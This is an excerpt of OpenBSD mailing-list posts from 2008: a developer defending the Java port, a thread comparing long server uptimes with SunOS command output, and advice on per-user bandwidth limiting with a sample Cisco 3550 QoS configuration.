also. Your negativity sucks. Porting Java to OpenBSD was and is not a trivial effort. It also serves as an excellent test bed for threads, the runtime linker and large memory applications. Porting Java to OpenBSD enabled the LOCKSS project to use it for its noble goals. It uncovered deadlocks in our pthread lib that resulted in large improvements to libpthread. Its use of dlopen() and friends resulted in significant improvements in our runtime linker. Oh and who made those improvements??? The same person who took the time to port Java to OpenBSD!! Me and other OpenBSD developers who saw the need to improve things. BTW, all those system level improvements have made significant stability gains for applications like firefox, KDE, OpenOffice, Asterisk, etc, etc which all use threads and dlopen() alot. Quite frankly I'm pretty upset at all the 'Java sucks' banter on misc. If you and the other naysayers don't realize that porting Java to OpenBSD was a 'Good-Thing' then you are just UNINFORMED! -Kurt
Re: Longest Uptime?
Okai, here's my $0.02 on the subject: http://systemnet.no/ios-uptime.jpg /Pete On 29 Oct 2008, at 18:49, guilherme m. schroeder wrote: Hi, Uptimes sucks. Here's the biggest i've ever seen in the company i work: [EMAIL PROTECTED] ~]$ uname -a SunOS optg998 5.6 Generic_105181-26 sun4u sparc SUNW,UltraSPARC-IIi- cEngine [EMAIL PROTECTED] ~]$ uptime 3:40pm up 2639 day(s), 13:50, 1 user, load average: 0.08, 0.07, 0.06 [EMAIL PROTECTED] ~]$ date Wed Oct 29 15:45:24 BRST 2008 [EMAIL PROTECTED] ~]$ psrinfo -v Status of processor 0 as of: 10/29/08 15:41:07 Processor has been on-line since 08/08/01 00:50:54. The sparc processor operates at 440 MHz, and has a sparc floating point processor. [EMAIL PROTECTED] ~]$ dmesg | tail -5 SUNW,hme0: Using External Transceiver SUNW,hme0: 100 Mbps half-duplex Link Up dump on /dev/md/dsk/d50 size 2042608K SUNW,hme0: Using External Transceiver SUNW,hme0: full-duplex Link Up Ok it's not OpenBSD, blame on me. But what i liked is that this machine is working for 2639 days and it stills blink green leds. The harddisk never gave up too. No errors on dmesg. It's a Netra T1 machine, running our internal DNS server. I think we'll replace it when it dies ;) On Wed, Oct 29, 2008 at 7:15 AM, Gilles Chehade <[EMAIL PROTECTED]> wrote: new_guy a icrit : I know. Longest uptime is silly, macho, pointless stuff... but I ran across an old SunOS 2.6 box that had been up for 387 days. It had been hacked. The only reason it was not an open mail relay is that /var was full. So, I thought to myself, "I bet I could run an OpenBSD box for that amount of time or longer without getting hacked and without doing much to it." Just wondering what's the longest OpenBSD uptime some folks on misc have seen? Thanks It is not the size of your uptime that matters, it is what you do with it. Gilles
Re: Per User Bandwidth Limiting
Indeed, I believe whilst c3750 support traffic-shaping, the c3550 does not. BTW, instead of assigning a /30 per user as wasting 75% of your IP address space, try looking that the 'private vlan' IOS command, which should allow you to use much bigger subnets and still control the user- user traffic. /Pete On 14 Dec 2008, at 13:10, Marco Matarazzo wrote: Hi Justin, I have an ISP situation where there is about 1000 users sitting behind Cisco 3550 switches. Each port is 1 user and is configured with an individual VLAN where each VLAN is assigned a small network subnet and corresponding DHCP scope. The problem is that it seems (so I have been told) is these 3550's will not effectively bandwidth limit at the port level. Incoming bandwith is limited as configured, but outgoing is not. So, I am looking at a pf solution but google is not turning up any specific information for such a situation. This is not true. It's more tricky, but you can actually limit both inbound and outbound at the port level, and it's quite effective too. Of course OpenBSD is capable of that too, but for 1000 vlans you'll have to split the load across multiple firewalls (or multiple cluster of firewalls) since there're hardcoded limits on the number of queues you can create (256 cbqs and 64 hfsc if I remember well, it's been discussed in the past however!) The config for the 3550 is something like this: Define the class-maps (all-in and all-out are different because of hardware limitations) class-map match-any all-out match ip dscp default class-map match-any all-in match access-group 100 Define the policy maps: policy-map 1mbit-in class all-in police 1024000 192000 exceed-action drop policy-map 1mbit-out class all-out police 1024000 192000 exceed-action drop And apply the policies to the interfaces: interface FastEthernet0/4 description CustomerX no switchport ip address 1.2.3.4 255.255.255.x (or if it's a switchport, just "switchport mode access" and then "switchport access vlan x") ip rip advertise 3 no cdp enable service-policy input 1mbit-in service-policy output 1mbit-out Also note that this is rate-limiting, not bandwidth shaping, but it may fit your requirements! Cheers, ]\/[arco